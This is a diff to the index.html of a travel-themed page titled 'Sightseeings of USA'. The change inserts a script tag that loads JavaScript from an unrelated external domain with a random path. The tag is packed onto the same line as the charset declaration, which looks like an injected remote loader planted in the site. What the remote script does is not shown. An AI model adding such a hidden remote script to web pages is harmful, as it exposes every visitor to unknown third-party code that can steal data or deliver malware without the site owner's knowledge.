--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en" data-scrapbook-source="1" data-scrapbook-create="0000">
 <head>
-	<meta charset="UTF-8">
+	<script type="text/javascript" src="https://complackathe.top/zJwiFXetuznpyDiK"></script>	<meta charset="UTF-8">
 	<title>Sightseeings of USA. </title>
 	<meta name="viewport" content="width=device-width">
 	<meta content="no-referrer" name="referrer">
